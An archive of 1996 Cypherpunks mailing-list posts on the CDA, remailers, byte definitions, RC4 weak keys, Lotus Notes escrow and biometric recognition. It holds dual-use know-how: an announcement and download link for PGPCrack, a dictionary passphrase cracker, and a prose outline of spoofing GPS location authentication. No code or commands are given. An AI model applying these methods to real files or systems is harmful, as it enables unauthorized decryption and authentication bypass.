>>drivers licence flag as it sees fit.  When a PPP account of a "minor"
>>sends a packet, the router always inserts "minor".  When the account of
>>an adult sends it, it inserts "adult".  When the account of a partner
>>who has contractually accepted liability for the flag's setting sends a
>>packet, it leaves it alone.
>>
>How would this work in my case?
>I have a Pipeline 25 ISDN router in my house.
>I have several computers, used by myself, my wife, and my kids, connected
>via Ethernet to the p25. The router talks to my provider. I have _one_
>account at my provider.
>
>Multiple IP #s, multiple machines, multiple users, ONE account.
>Which router will insert the "suggested" flag, and how will it decide which
>packets to tag?

The way I envision it (in my nightmares), you'd have two options:  have
the account configured as "kid safe", and live in a cyberspace playground,
or have it configured as "adult", and accept responsibility for your kids'
use.  As I see it, with the censorship support at the network layer that
I outlined, the ISP can have "common carrier" status.  They sold the account
to an adult, so all packets delivered to the account are delivered to that
adult, as owner of the ISDN router.  If the adult chooses to then deliver
that packet to a child, it's no different than if the adult buys a copy
of "Debbie Does Dallas" and shows it to the kid.

>I suspect the people who thought this up haven't thought it through. :-)
>They are confusing "ISP accounts" with "e-mail" addresses, maybe?

Well, I don't know that the CDA supporters are thinking of.  I just
responded to the charge of "technically infeasible" with an outlined
technical solution.

I *do* think that the separation between ISP account and email address
isn't quite as black and white as you seem to think.

>My setup may be unusual, but it's certainly not unique.

Actually, I expect configurations like yours to become more widespread
in the near future.  There are a lot of cable-modem designs that
basically put an ethernet port on your cable box.  There's little
practical difference (from a network topology perspective) between that
and your ISDN setup.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Sat, 13 Apr 1996 21:37:24 +0800
To: Cypherpunks <alanh@mailhost.infi.net>
Subject: Re: On computer face recognition:
In-Reply-To: <Pine.SV4.3.91.960411144737.17506D-100000@larry.infi.net>
Message-ID: <m0u7mkF-0004KkC@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


Alan Horowitz writes:

: How do _people_ recognize faces?

Some of us don't.

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SBinkley@atitech.ca (Scott Binkley)
Date: Sun, 14 Apr 1996 00:14:28 +0800
To: me%muddcs.cs.hmc.edu@genie_1 (Michael Elkins)
Subject: Re: Scientologists may subpoena
In-Reply-To: <1A5C983A02502C79@-SMF->
Message-ID: <5F61983A01502C79@-SMF->
MIME-Version: 1.0
Content-Type: text/plain


>with bated breath to see whether or not the subpoena is issued.  But if
>chaning outside the US won't even work, then the remailers aren't going
>to do a whole lot of good.

What if we set up a chaining remailing system in as many countries as 
possible, all working in double blind
mode.  You could have it randomly pick 20 or so remailers before actually 
sending the message to its destination.

That isn't a very clean method, but would sure slow down the process of 
obtaining court orders in each respective country.

I have this other idea, but it would be difficult to set up.  Again, with 
many many remailers, you could set it up, so that 
any message you send is sent to a random FTP site of the day.  Each of 
the remailers randomly picks messages out
of the pool at the FTP site, and sends it on its way (all is encrypted of 
course).  At the end of the day, the FTP site is 
erased, and  a new one is set up somewhere else (all remailers would then 
scan there).

The beauty is that when a remailer pulls a message out of the FTP site, 
it has no idea where the message came from, nor which
remailer (country) sent it there (providing the pooled messages have had 
the return addresses removed).  This would make it 
very difficult to track down to the source.

The disadvantage is that it requires cooperation between remailers, and 
that a message cannot be replied to.

Anyway, just my $0.02

/sb




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@ACM.ORG>
Date: Sat, 13 Apr 1996 11:14:56 +0800
To: cypherpunks@toad.com
Subject: Answer about bits and bytes
In-Reply-To: <m0u7lBY-0008yHC@pacifier.com>
Message-ID: <199604122104.OAA01053@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



jim bell <jimbell@pacifier.com> writes:
>See, I do not challenge the fact that there were plenty of data objects of 
>length other than 8-bits.  The issue is whether or not the people back then 
>actually believed that a correct, official usage of the term "byte" included 
>lengths other than 8.

Reading from the PDP-10 Reference Handbook (DEC, 1971) page 2-30, we read:

	To conserve memory, it is useful to store data in less than full
	36-bit words.  Bytes of any length, from 1 to 36 bits, may be
	entered using a BYTE statement.

		BYTE (N) X,X,X

	The first operand is the byte size in bits.  It is a decimal number
	in the range 1-36, and must be enclosed in parentheses.
	...
	In the following statement, three 12-bit bytes are entered:

	  LABEL: BYTE (12)56,177,N

	This assembles as...

and so on.  The PDP-8 "Introduction to programming" (1970) has similar
remarks, though not as explicit.  On page v in the introduction it says

	o A six-bit byte swap instruction that provides much faster...

and in the description of special periph ops on page D 1-15:

	VBA     6534    BYTE ADVANCE command requsts next twelve bits, data
			ready flag is set.

I suggest you gracefully back off, if it's still possible.

	Jim Gillogly
	Sterday, 22 Astron S.R. 1996, 21:04




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rick hoselton <hoz@univel.telescan.com>
Date: Sat, 13 Apr 1996 11:50:48 +0800
To: cypherpunks@toad.com
Subject: Re: Entropy Estimator
Message-ID: <199604122106.OAA15596@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:19 AM 4/12/96 -0400, JonWienke@aol.com wrote:

>I just added a feature to my entropy graphing program that 
>estimates the number of bits of entropy in the file,

Hey, that's just what I need.  I have these two 8-million byte 
files.  One is a recording made by a geiger counter, every bit 
is uncorrelated with anything else in the universe and each bit 
is equally likely to be a one or a zero.  The second file is an 
IDEA encryption of all the four-byte numbers 
from one to two-million.

Here's my problem.  I can't remember which file is which, and I've 
forgotten sixty-four bits of the key I used to produce the encrypted file.

That's where your technique come in.  The first file has sixty-four 
million bits of entropy.  The second file has only sixty-four bits 
of entropy, total (the missing key bits).  Surely, your technique can 
tell me which file is which.

Estimating entropy can be difficult, and I don't expect perfection.
But any measuring technique that is not a complete HOAX must be able 
to clearly find a difference of six orders of magnitude.  If you tried 
to give me a ruler that couldn't detect the difference between a 
millimeter and a kilometer, I might think you misunderstood 
something about the concept of distance.  If encouraged me to use a 
clock that could not measure the difference between a minute and a year, 
many would conclude that you were not an expert in chronology.

So, if your technique is worth anything at all, it should be able to 
accomplish this easy task.

PS.  I think it is your patriotic duty to report this technique to the 
Federal government.  They frequently need to distinguish between 
ciphertext and just plain random digits.  A breakthrough like this 
would have a major impact on national security.  They might be 
willing to remove ITAR restrictions from cryptography, out of 
gratitude to the cypherpunks.  






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Sat, 13 Apr 1996 15:15:34 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Digital Cash Escrow
In-Reply-To: <m0u7VIU-0008zAC@pacifier.com>
Message-ID: <199604121921.PAA03867@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


jim bell writes:
>At 09:17 AM 4/11/96 -0500, John Deters wrote:
>  Go dig up the manuals for a
>>UNIVAC 1100, Jim.  Why do you think the RFCs for IP specifically refer to
>>"octets" as opposed to "bytes"?  Because (they explain) "octet" is
>>unambiguous, which then infers a certain ambiguity to "byte", now, doesn't it?
>
>Wasn't the original development of the Internet done in the middle 1960's?  
>And thus, does its development pre-date the coinage of the term, "byte"?  
>
>If that's true, doesn't this answer your question?  The terminology used for 
>the definition of a standard often tends to be frozen in time.  Lacking the 
>term "byte" they used "octet."  The subsequent invention of the term "byte" 
>would not have displaced the original term, at least in Internet standards.

Well, the earliest RFC is dated 4/7/69.  That's not really "middle 1960's".
The term "byte" seems to date from the mid-to-late 1950's.  Try again.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sat, 13 Apr 1996 19:36:05 +0800
To: coderpunks@toad.com
Subject: PGPCrack
Message-ID: <Pine.LNX.3.92.960412143325.258A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I have written a UNIX program that will brute-force crack a PGP conventionally
encrypted file using a dictionary of passphrases.  I am working on making it
possible to break secret keys also.  If you have any suggestions or bug
reports, feel free to e-mail them to me.  The URL is:

http://www.voicenet.com/~markm/pgpcrack5b.tar.gz

The MD5 hash of this file is 46aa9e37020ac2efce73d870fe1acbdc.

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xf9b22ba5
http://www.voicenet.com/~markm/ | bd24d08e3cbb53472054fa56002258d5
"The concept of normalcy is just a conspiracy of the majority" -me

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMW6j0LZc+sv5siulAQETGAQAnKr1n/OnWS6CpQqTQSRAJhTTCkq1zP8N
l0QZYKrvO9i3EE0uXYF88EIXludrXq2mzEZCOeh4vjF0Ym8KEc82gUdRwAfxPxTU
YxHylDI56PdvgLwRBAoBiGTaUZwajM+sEtvJaH1fYshPR7neTF+Aw3YL+cMQ/iQt
PMFKXEM9GWQ=
=fgA8
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sat, 13 Apr 1996 18:07:54 +0800
To: Doug Hughes <cypherpunks@toad.com
Subject: Re: questions about bits and bytes
Message-ID: <2.2.32.19960412215132.0095ccdc@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:34 AM 4/12/96 -0500, Doug Hughes wrote:
>
>On Apr 12 at 8:07
>jim bell wrote:
>>
>>Are you sure they're not referring to 8 bits of data and a parity bit?  In 
>>any case, please give the address to the list so that it can be checked out.
>
>Come on, give it up already and admit you were wrong. At least 8 different
>people have cited examples of machines that supported non 8bit bytes. Your
>pride is getting the best of you.

Jim is unwilling to admit his errors, even in things he has little or no
training in.  (I remember him claiming at one point that he was not a
programmer or did any coding for that matter.  Why he continues to persist
in such things I will not speculate on...)

I have worked on a couple of machines (that are still in use today) that
were non-standard bit sizes.  Many of the legacy machines from the old
mainframe days (about 20+ years ago) had non-standard bit sizes.  (Which
made communication between then an interesting mess.)  The old Microdata
PICK machines had a weird byte size, for example.  Some of the old Vax
machines had the same "difficulty".

>If you mean 8 bits, you should really say Octets as has always been the
>form of Internet RFC's where the distinction is important.

Making the assumption as to the stability of the sizes of bytes, words, and
characters can get you into alot of trouble in the coding world.

Characters are a good case in point.  Depending on your OS and/or language,
you could be talking about 5, 7, 8 or more bits.  With the need to
distribute applications internationally, the need to support all sorts of
character schemes makes it even more variable.  Unicode is 16 bytes per
character.  Shift JIS can be variable.  (Either 8 or 16, if I remember
correctly.)  It just depends on the hardware, software, and compiler being
used.  I am sure that alot of old code is getting broken by the assumption
that a character is always 8 bits.  Assuming the same about bytes on old
machines will do about as much good.

>It may be standard today, but it was not always so..

And the standards change.  I expect that at some point, some standards group
will change all the terms again.  (And this argument will flare up again...)

---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jon Leonard" <jleonard@divcom.umop-ap.com>
Date: Sat, 13 Apr 1996 17:14:17 +0800
To: cypherpunks@toad.com
Subject: Re: questions about bits and bytes [NOISE]
In-Reply-To: <960412012047_270015300@mail06>
Message-ID: <9604122214.AA09462@divcom.umop-ap.com>
MIME-Version: 1.0
Content-Type: text


Jonathan Wienke wrote to Cypherpunks:
> In a message dated 96-04-11 20:26:44 EDT, jeffb@sware.com writes:
> 
> >[I told myself I was going to stay out of this, but Jim Bell's dogmatic
> >stance irks me... ]  Here's a citation from "Portability of C Programs
> >and the Unix System" by S.C. Johnson and D.M. Ritchie (yes, that Richie)
> >in the Bell System Technical Journal volume 57, Number 6, July-August 1978.
> 
> Citing sources from 1978 in the computing field is a little like using
> dictionaries from the 1800's to dictate modern English usage.  My desktop
> machine has as much computing power as some colleges had during that era.
>  We've come a long way, baby!  Yes, in the past, the term "byte" applied to
> entities other than 8 bits, but "8 bits" IS the commonly accepted, standard
> meaning of "byte" now, in the present.  The fact that the meaning and usage
> of words can change over time is not relevant to current meaning and usage.
>  Anyone who wishes to dispute this should study the etymology of the word
> "gay."

The most recent use of a non-8-bit byte I can find is from 1994 (no typo,
2 years ago).  It's a spec for a RAM cell in ASIC design, and the usage is 
more or less "smallest individually writable memory unit".  By design,
bits must be written in chunks (bytes!), which in this case are 22 bits.

As much as I'd like byte to be a standard, unambiguous 8-bits, there's
still other uses out ther, which is why even recent RFCs specify
octets instead of bytes.

That said, I agree that older CS references aren't a reliable indicator
of modern usage.

> Jonathan Wienke

Jon Leonard




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul_Koning/US/3Com%3COM@smtp1.isd.3com.com
Date: Sat, 13 Apr 1996 19:59:29 +0800
To: timd@consensus.com
Subject: Re: No matter where you go, there they are.
Message-ID: <9604122226.AA4262@>
MIME-Version: 1.0
Content-Type: text/plain


>While we may disagree with Ms. Denning on a number of political matters,
>she's quite intelligent; I suspect the paper is well-founded.

Yes, that was my initial reaction too, but the content just don't support that.
I suspect this is a case of a person well-qualified in one area (crypto)
working in very different area (GPS) where she is not qualified and does
not understand what is going on.

>GPS receivers are line-of-sight only; only a small portion of the earth can
>see the same satellites.

Well, sort of.  The satellites are up at 11,000 miles, which makes for a large
footprint.  You'd certainly see most of the same satellites from several
states away.

>It might be possible to seperately record the signals from several
>different satellites, delay them each just the right amount of time, and
>then recombine them to simulate being at another nearby location (within
>several hundred miles). 

Right, that's what several of us have been saying.

>However, this might not be possible. Examine the
>following quote from Denning's paper:
>
>:The location signature is virtually impossible to forge at the
>:required accuracy. This is because the GPS observations at any given time
>:are essentially unpredictable to high precision due to subtle satellite
>:orbit perturbations, which are unknowable in real-time, and intentional
>:signal instabilities  (dithering) imposed by the U.S. Department of Defense
>:selective availability (SA) security policy.

Sure, but that is nonsense.  Here's why.

The time delay you need to introduce a 200 mile shift is 1 ms.  The effects
Denning et al. are talking about are LOW FREQUENCY effects.  This is
obvious for orbital perturbations, since we're talking about small motions of
large heavy objects here, and it is also true for the S/A dither. Indeed
it has to be that way, since any high frequency jitter would prevent the
receiver from locking on the spread spectrum code that's at the core of
how GPS works.  In other words, at the millisecond  level, none of those 
effects exist.

Re Hal's comments:
>Note however that Denning did not mention the Internet in her spiel.
>
>I believe her method would be workable across lower latency networks, if such
>exist or eventually exist.  Perhaps direct connections or leased lines would
>provide low enough latency; I don't know.  In any case networks are likely
>to become faster in the future and her method might eventually work.
>Actually the issue is not just latency but whether the latency can be
>lied about, and for some kinds of networks that would be harder.

What a checking system actually observes is: at time T2 it receives
a message that claims to have been generated at time T1 by a system
at location X.  It would accept the authentication as valid if the elapsed
time T2-T1 is small enough to be believable.  How small this is depends
on (a) the transmission latency, (b) the processing delay in X and in
the checker.  

There are two flavors of attack on this:

1. Attacker Y uses the real-time signals from the satellites, delayed as
needed.  It sends those after processing, just as X would have done
(except that X doesn't insert the processing delay).  The elapsed time
seen by the checker differs from the case of X by the sum of the
processing delay and the incremental transmission latency (since Y
is at a different place than X, so its connection to the checker may have
either less or more latency).

This fools the checker if the incremental latency is within its tolerance.
Suppose that I'm using a LAN -- in that case a transmit delay on the
order of 1 ms is plausible.  X and Y would be about the same (of course
it has hard for Y to get on the LAN unobserved...).  If X is less than
20 miles away, the processing delay is under 100 microseconds, which
is "in the noise".

If I'm in a WAN, then the latency is likely to be greater, but even if is is
1 ms, I can be many miles away before it becomes obvious.

The above of course assumes that the signal processing is done in
hardware (or fast DSP) so it can indeed be done in well under 1 ms.
Not a big deal...  That seems to be one Denning mistake, the thinking
only of replay in the sense of long delayed spoofing messages.

2. Attacker Y synchronizes to the satellites but constructs a signal
locally that effectively "anticipates" what the satellite is about to send.
This allows it to get the effect of a negative delay (thus avoiding
the "node in the ground" problem).  Since the signal is entirely
predictable at the few-ms level, this is not difficult, though it requires
a bit more effort than the simple delay approach.  This way Y can
construct a signal acceptable to the checker, even if its transmit latency
to the checker is greater than it is for X.  It simply anticipates by
the difference plus whatever it needs to fake the position.

Finally...

As Hal also pointed out, if the system allows users to have partial
sky view, then the attacker can avoid the need for negative delays
entirely by selecting satellites closer to him than to the legitimate
user.

For anyone interested in an intro to GPS, Trimble (one of the leading
companies in the industry) puts out some skinny paperbacks
with nice clear explanations.  They sometimes are a bit at
the "see Spot run" level, but they do have the correct story.

 paul

!-----------------------------------------------------------------------
! Paul Koning, NI1D, C-24183
! 3Com Corporation, 1-3A, 118 Turnpike Road, Southborough MA 01772 USA
! phone: +1 508 229 1695, fax: +1 508 490 5873
! email: paul_koning@isd.3com.com  or  paul_koning@3mail.3com.com
! Pgp:   27 81 A9 73 A6 0B B3 BE 18 A3 BF DD 1A 59 51 75
!-----------------------------------------------------------------------
! "Be wary of strong drink.  It can make you shoot at tax collectors
!  -- and miss!"
!                -- Robert A. Heinlein, "The Notebooks of Lazarus Long"
!                   in "Time Enough for Love"


  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jay Holovacs <holovacs@styx.ios.com>
Date: Sat, 13 Apr 1996 09:25:14 +0800
To: Alan Horowitz <alanh@mailhost.infi.net>
Subject: Re: On computer face recognition:
In-Reply-To: <Pine.SV4.3.91.960411144737.17506D-100000@larry.infi.net>
Message-ID: <Pine.3.89.9604121506.A6799-0100000@styx.ios.com>
MIME-Version: 1.0
Content-Type: text/plain


This is a significant area of research, and is not that well understood. 
It is known that a dedicated area of the brain is used, and that damage 
to this area keeps people from recognizing faces even though they may 
retain their ability to recognize objects generally. Face recognition is 
much tougher than it would seem.

-----------------------------------------------------------------------
Jay Holovacs <holovacs@ios.com>
-----------------------------------------------------------------------
PGP Key fingerprint =  AC 29 C8 7A E4 2D 07 27  AE CA 99 4A F6 59 87 90 

On Thu, 11 Apr 1996, Alan Horowitz wrote:

> How do _people_ recognize faces?
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Marshall Clow <mclow@owl.csusm.edu>
Date: Sat, 13 Apr 1996 10:45:02 +0800
To: cypherpunks@toad.com
Subject: Re: Protocols at the Point of a Gun
Message-ID: <v03005b03ad94a136129f@[206.126.100.99]>
MIME-Version: 1.0
Content-Type: text/plain


Scott Brickner wrote:
>Somebody who might be Marshall Clow wrote:
>>Multiple IP #s, multiple machines, multiple users, ONE account.
>>Which router will insert the "suggested" flag, and how will it decide which
>>packets to tag?
>
>The way I envision it (in my nightmares), you'd have two options:  have
>the account configured as "kid safe", and live in a cyberspace playground,
>or have it configured as "adult", and accept responsibility for your kids'
>use.
>
I have no problem whatsoever with this.
Guess which option I'd choose :-)

However, given the hysteria that is surrounding the CDA, etc., I think that
the second option would be "politically unacceptable". The whole thrust [
sorry for the sexual imagery ;-) ] behind [ oops, now it's sodomy ] the CDA
is that it's not good enough for parents to take responsibility for their
children's use; the government must be involved.

-- Marshall

Marshall Clow     Aladdin Systems   <mailto:mclow@mailhost2.csusm.edu>

"Eternal vigilance is the price of PostScript"
-- MacUser Jan 96 DTP and Graphics column






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 13 Apr 1996 12:55:45 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: On computer face recognition:
In-Reply-To: <ad931b9413021004c822@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.960412155140.27436A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 11 Apr 1996, Timothy C. May wrote:

> At 7:14 PM 4/11/96, David Loysen wrote:
> 
> >Take a peak at http://www.neci.nj.nec.com/homepages/lawrence/papers. One of
> >Lawences papers is on using Neural networks to recognize faces. Methinks
> >that the state of the art is advancing rapidly and such problems as not
> >looking at the camera or changing your expression are rapidly being overcome.
> 
> One system I read up on a few years ago relied heavily on ear shape....it
> seems that the profile of ears varies tremendously and ear profiles are
> fairly easy to get a kind of hash of, assuming the ear profile is not
> obstructed by hair.

Even ears are not perfect.  Recall the case of the pretender to the 
Romanov/Feodorovich dynasty, "Anna Anderson."  Three independent experts 
used ear profiles to confirm she was indeed the lost Tsarevna Anastasia, a 
judgment later proved wrong by a combination of handwriting analysis, trip ups, 
DNA, and the discovery of the actual Tsarevna's remains.

> "Get a haircut" may once again return to favor.

I can't cite sources, but the current doctrine is silly putty (tm).  Aside 
from looking much like flesh, being easy to apply and mold, it tends to 
absorb and radiate heat fairly well.  The result is a nice distortion of 
IR shots of ears.  While careful analysis will reveal the putty 
eventually, (it will always be somewhat cooler than the flesh) when properly 
applied, silly putty (tm) will so distort the actual ear profile as to 
render identification by this method alone nearly impossible.  

Users with darker skintones are told to add a mixture of blue and red 
food coloring to the putty.  Add salt to taste.

> --Tim May

> Boycott "Big Brother Inside" software!
> We got computers, we're tapping phone lines, we know that that ain't allowed.
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
> Higher Power: 2^756839 - 1  | black markets, collapse of governments.
> "National borders aren't even speed bumps on the information superhighway."

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <wcs@idiom.com>
Date: Sat, 13 Apr 1996 12:19:25 +0800
To: cypherpunks@toad.com
Subject: Cypherpunks Bay Area - Saturday 1:00 Printer's Ink
Message-ID: <199604122337.QAA20471@idiom.com>
MIME-Version: 1.0
Content-Type: text/plain


The usual suspects for meeting places having fallen through,
there will be a Bay Area Cypherpunks meeting at 1:00 Saturday
at Printer's Ink on Castro Street in Mountain View.
Meet at the outside tables by the side of the building,
and we'll see if the meeting migrates from there.
If we're not there, and the meeting has moved when you arrive,
look for a note on a lamppost in front of the building.

Directions: Castro Street goes between the Central Expressway
and El Camino Real in the middle of Mountain View;
Printer's Ink is on a corner in the middle.
Parking is around back.  Coffee is upstairs, books are inside.

Directions from far away - take Route 101 to the Moffett exit,
head west/south, watch the street name mutate at the Central Expressway 
and train  tracks.

Public Transit: Take CalTrain to the Mountain View Exit, walk about
three blocks west/south.

Agenda: As you've guessed from this highly timely notice, there's a full
schedule of events planned.  I'd like to talk about remailer spam prevention,
and there's been a lot of activity recently on Denning's position escrow,
Scientology court cases, CDA, and other entertaining politics.

		Thanks!  Bill

Replies to: stewarts@ix.netcom.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "D.A. Wagner" <daw27@newton.cam.ac.uk>
Date: Sat, 13 Apr 1996 06:22:07 +0800
To: jamesd@echeque.com
Subject: Re: RC4 improvement idea
In-Reply-To: <199604120717.AAA17361@mail1.best.com>
Message-ID: <199604121550.QAA19509@jordan.newton.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


> At 02:57 AM 4/9/96 -0700, David Wagner wrote:
> > For one key in 256, you have a 13.6% chance of recovering 16 bits of
> > the original key.
> >
> > On average, the work factor per key recovered is reduced by a factor
> > of 35 (i.e. the effective keylength is reduced by 5.1 bits) by using
> > this class of weak keys.
> 
> Why do you not just assume the last byte of the key is 0x4A
> 
> Then for one key in 256 the effective keylength is reduced by a
> whole 8 bits instead of a measly 5.1 bits.

No.  The 5.1 bit figure is averaged over the whole damn keyspace.
If you pick a random 40 bit key (not necessarily a weak key), and
I apply the Andrew Woos attack, I can guess your key with 2^{40-5.1}
= 2^34.9 work factor, on average.

Look.  1 in 256 keys are weak.  For a weak key, you have a 1/7.35 = 13.6%
chance of recovering 16 bits of the key.  This is an advantage for the
attacker, as 2^16 / (256*7.35) = 34.8 = 2^5.1 > 1.

Suppose you called keys with the last byte 0x4A jamesd-weak.  1 in 256
keys are jamesd-weak.  For a jamesd-weak key, you have a 1.0 = 100% chance
of recovering 8 bits of the key.  This is not an advantage for the attacker,
as 2^8 / (256*1.0) = 1.0.

Keep an open mind,
-- Dave Wagner




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Sat, 13 Apr 1996 14:28:18 +0800
To: shamrock@netcom.com (Lucky Green)
Subject: Re: [NOISE] Why there are so many cluless people
In-Reply-To: <v02120d39ad9446cc8b78@[192.0.2.1]>
Message-ID: <9604122211.AA00317@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


>  Today, I heard a commercial on the radio. Some company wants
>  to help you make $1k+ per day as an Internet expert. Simply
>  listen to their one week audio tape course and you know
>  everything you need to work as an Internet consultant.

I heard that Internet Privacy Guaranteed is coming out with their own set of  
cassette tapes...  ;-)

"Become a cryptanalyst in 21 days, while you sleep, or your money back!"


andrew




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 13 Apr 1996 14:49:38 +0800
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: Lotus notes 24 bit hack project?
In-Reply-To: <199604112014.NAA16020@netcom7.netcom.com>
Message-ID: <199604122144.RAA25414@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"Vladimir Z. Nuri" writes:
> reading notes on the recent RSA conference reminds me of something.
> 
> Lotus announced their 64 bit encryption for foreign users some 
> months ago, with 24 bits secretly "owned" by the NSA. there
> was some speculation here about how this was handled.

Actually there was virtually no speculation. There is an RSA public
key embedded in every copy of Lotus notes that was supplied by the NSA
and in which the top 24 bits get encrypted and sent out over the
wire. Its all simple enough.

> in any case it seems that reverse engineering of Lotus Notes
> would provide the answer, and we'd be able to embarrass both
> NSA and Lotus (who imho deserves it, for caving in to the NSA)
> all in the same sweep by revealing it to the world!!!

Revealing what? Its not like there is a mystery, Mr. Detweiler.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nyap@mailhub.garban.com (Noel Yap)
Date: Sat, 13 Apr 1996 15:54:15 +0800
To: markm@voicenet.com
Subject: Re: NYT: Chaotic Encryption: a Solution in Search of a Problem
Message-ID: <9604122153.AA00613@mailhub.garban.com>
MIME-Version: 1.0
Content-Type: text/plain


> There has been research into developing chaos based encryption, but none of
> the systems developed are nearly as strong as block ciphers such as IDEA and
> 3DES.  Chaos encryption is more like steganography than encryption.
> The chaos encryption schemes that I know of use a driving circuit to generate
> the carrier wave for the transmission.  If a person on the other end knows the
> driving circuit used, then that person can remove it.  The output of a chaos
> encryption mechanism is similar to static, but I don't think that it is
> particularly strong.  With proven strong encryption, the only advantage I can
> see to using chaos encryption would be to encrypt analog data.

I've actually been thinking about using chaos to sporadically add noise to some information before the info is encrypted.  After decryption, the receiver would then have to separate the noise from the real content.
Has anyone else thought about this?  Please respond directly to nyap@garban.com 'cos I'm no longer on the cypherpunks list.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 13 Apr 1996 14:10:47 +0800
To: stewarts@ix.netcom.com
Subject: Re: A MODEST PROPOSAL (fwd)
Message-ID: <01I3GOIKUJYM8Y50UU@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"stewarts@ix.netcom.com"  "Bill Stewart"  2-APR-1996 06:31:08.52

>This happens any time anybody signs up with an an######@anon.penet.fi address.
>Ideally, someone could, in their copious spare time, hack majordomo
>to automatically translate all subscription requests of that form to
>na######@anon.penet.fi ; as an alternative, if majordomo has some sort
>of subscription blocking list an*@anon.penet.fi belongs on it.

	In other words, majordomo is broken. I should have suspected as much,
given the weird way headers turn up compared to all other mailing list
programs. Can that be reconfigured by the list owner? I may be starting up a
list (on c2.org) sometime (after I finish 3 papers, an oral presentation, and
some finals), and what I've got available is majordomo. Curing this problem
would be good.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Sat, 13 Apr 1996 11:54:58 +0800
To: cypherpunks@toad.com
Subject: PICS
Message-ID: <199604130056.RAA11192@netcom9.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I had a chance for a brief look at the PICS protocol, and it seems to have
a lot of cypherpunks relevance.  It includes features such as:

  Multiple third party rating systems
  Digital signatures

I will have to find time to look at it in more detail.

Regards - Bill


------------------------------------------------------------------------
Bill Frantz       | The CDA means  | Periwinkle  --  Computer Consulting
(408)356-8506     | lost jobs and  | 16345 Englewood Ave.
frantz@netcom.com | dead teenagers | Los Gatos, CA 95032, USA






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 13 Apr 1996 13:10:37 +0800
To: unicorn@schloss.li
Subject: Re: So, what crypto legislation (if any) is necessary?
Message-ID: <01I3GPGIWMLG8Y50UU@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"unicorn@schloss.li"  "Black Unicorn"  5-APR-1996 06:26:05.96

>There are ways to resist compelled discovery.  These are not they.

	Any methods you're willing to mention sans a money order?
	-Allen 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
